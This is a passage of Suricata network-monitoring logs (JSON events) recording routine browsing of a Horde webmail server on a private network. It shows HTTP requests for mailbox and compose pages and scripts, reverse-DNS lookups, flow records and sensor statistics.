Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=KCDsO_NmBjYX5zVsrCfQDx7&task=eu7ipj_hNihBGhyVt8Xmy50&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/nag\/list.php","length":20}} {"timestamp":"2020-02-29T00:02:04.979571+0000","flow_id":69813250355827,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45990,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":26867,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:05.090880+0000","flow_id":69813250355827,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45990,"proto":"UDP","dns":{"type":"answer","id":26867,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:05.090880+0000","flow_id":69813250355827,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45990,"proto":"UDP","dns":{"type":"answer","id":26867,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:02:06.000378+0000","event_type":"stats","stats":{"uptime":13778,"capture":{"kernel_packets":132438,"kernel_drops":0},"decoder":{"pkts":132444,"bytes":91945109,"invalid":179,"ipv4":131019,"ipv6":8,"ethernet":132444,"raw":0,"null":0,"sll":0,"tcp":126035,"udp":4791,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095904},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2664,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2680,"synack":2671,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":137,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1711,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2185,"failed_udp":106},"tx":{"http":4441,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2261}},"flow_mgr":{"closed_pruned":2641,"new_pruned":15,"est_pruned":2233,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20167,"memcap_state":0,"memcap_global":0},"http":{"memuse":42780,"memcap":0}}} 
{"timestamp":"2020-02-29T00:02:07.265389+0000","flow_id":1007666603637629,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52652,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":908},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2313,"tx_id":2}} {"timestamp":"2020-02-29T00:02:10.000572+0000","flow_id":915689860042098,"event_type":"flow","src_ip":"192.168.10.122","src_port":50356,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:57:09.200050+0000","end":"2020-02-28T23:57:09.311909+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:11.927835+0000","flow_id":1646985371396187,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":52256,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58265,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:12.039358+0000","flow_id":1646985371396187,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52256,"proto":"UDP","dns":{"type":"answer","id":58265,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:02:12.039358+0000","flow_id":1646985371396187,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52256,"proto":"UDP","dns":{"type":"answer","id":58265,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:12.119966+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":361}} {"timestamp":"2020-02-29T00:02:12.119966+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":361},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":240,"tx_id":0}} 
{"timestamp":"2020-02-29T00:02:13.000227+0000","event_type":"stats","stats":{"uptime":13785,"capture":{"kernel_packets":132458,"kernel_drops":0},"decoder":{"pkts":132459,"bytes":91954648,"invalid":179,"ipv4":131034,"ipv6":8,"ethernet":132459,"raw":0,"null":0,"sll":0,"tcp":126049,"udp":4792,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2664,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2680,"synack":2671,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":137,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1711,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2185,"failed_udp":106},"tx":{"http":4441,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2261}},"flow_mgr":{"closed_pruned":2641,"new_pruned":15,"est_pruned":2234,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20167,"memcap_state":0,"memcap_global":0},"http":{"memuse":42773,"memcap":0}}} 
{"timestamp":"2020-02-29T00:02:14.000230+0000","flow_id":296510195100328,"event_type":"flow","src_ip":"192.168.10.122","src_port":39865,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:57:13.060072+0000","end":"2020-02-28T23:57:13.168011+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:15.188187+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52654,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":361},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":592,"tx_id":0}} {"timestamp":"2020-02-29T00:02:15.196007+0000","flow_id":1288304062889383,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41386,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":6808,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:15.307685+0000","flow_id":1288304062889383,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41386,"proto":"UDP","dns":{"type":"answer","id":6808,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:02:15.307685+0000","flow_id":1288304062889383,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41386,"proto":"UDP","dns":{"type":"answer","id":6808,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:15.380900+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5163}} {"timestamp":"2020-02-29T00:02:15.449100+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52654,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5163},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":17869,"tx_id":1}} 
{"timestamp":"2020-02-29T00:02:15.453845+0000","flow_id":246860392947698,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52656,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/compose-base.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1833}} {"timestamp":"2020-02-29T00:02:15.456055+0000","flow_id":872675782682226,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52658,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/ckeditor\/imageupload.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":867}} {"timestamp":"2020-02-29T00:02:15.457505+0000","flow_id":246860392947698,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52656,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/compose-base.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1833},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/compose-base.js","state":"CLOSED","stored":false,"size":5941,"tx_id":0}} {"timestamp":"2020-02-29T00:02:15.456227+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/keynavlist.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2499}} {"timestamp":"2020-02-29T00:02:15.460235+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52660,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/compose-dimp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":10281}} 
{"timestamp":"2020-02-29T00:02:15.464545+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52660,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/compose-dimp.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":10281},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/compose-dimp.js","state":"CLOSED","stored":false,"size":46315,"tx_id":0}} {"timestamp":"2020-02-29T00:02:15.465098+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52654,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/keynavlist.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2499},"app_proto":"http","fileinfo":{"filename":"\/js\/keynavlist.js","state":"CLOSED","stored":false,"size":8737,"tx_id":2}} {"timestamp":"2020-02-29T00:02:15.465224+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52660,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/draghandler.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":908}} {"timestamp":"2020-02-29T00:02:15.466791+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/editor.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":712}} {"timestamp":"2020-02-29T00:02:15.467689+0000","flow_id":246860392947698,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52656,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/ckeditor\/imagepoll.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":795}} {"timestamp":"2020-02-29T00:02:15.469165+0000","flow_id":246860392947698,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52656,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/ckeditor\/imagepoll.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; 
rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":795},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/ckeditor\/imagepoll.js","state":"CLOSED","stored":false,"size":1911,"tx_id":1}} {"timestamp":"2020-02-29T00:02:15.469894+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52654,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/editor.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":712},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/editor.js","state":"CLOSED","stored":false,"size":2493,"tx_id":3}} {"timestamp":"2020-02-29T00:02:15.470165+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52660,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/draghandler.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":908},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/draghandler.js","state":"CLOSED","stored":false,"size":2941,"tx_id":1}} 
{"timestamp":"2020-02-29T00:02:15.470467+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/liquidmetal.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1403}} {"timestamp":"2020-02-29T00:02:15.476978+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52660,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/autocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2778}} {"timestamp":"2020-02-29T00:02:15.478627+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52660,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/autocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2778},"app_proto":"http","fileinfo":{"filename":"\/js\/autocomplete.js","state":"CLOSED","stored":false,"size":9648,"tx_id":2}} {"timestamp":"2020-02-29T00:02:15.513326+0000","flow_id":246860392947698,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52656,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/prettyautocomplete.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2788}} {"timestamp":"2020-02-29T00:02:15.521234+0000","flow_id":359534564994154,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52660,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/ckeditor\/ckeditor_basic.js","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2958}} 
{"timestamp":"2020-02-29T00:02:15.568491+0000","flow_id":246860392947698,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52656,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/prettyautocomplete.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2788},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/prettyautocomplete.js","state":"CLOSED","stored":false,"size":9444,"tx_id":2}} {"timestamp":"2020-02-29T00:02:15.568785+0000","flow_id":246860392947698,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52656,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/drafts.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":480}} {"timestamp":"2020-02-29T00:02:15.571258+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52654,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/liquidmetal.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=compose&type=new&token=t178Jy_bOFAgZYI5pak0cNw&uniq=1582934534901","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1403},"app_proto":"http","fileinfo":{"filename":"\/js\/liquidmetal.js","state":"CLOSED","stored":false,"size":3834,"tx_id":4}} {"timestamp":"2020-02-29T00:02:15.571729+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/forward.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":253}} 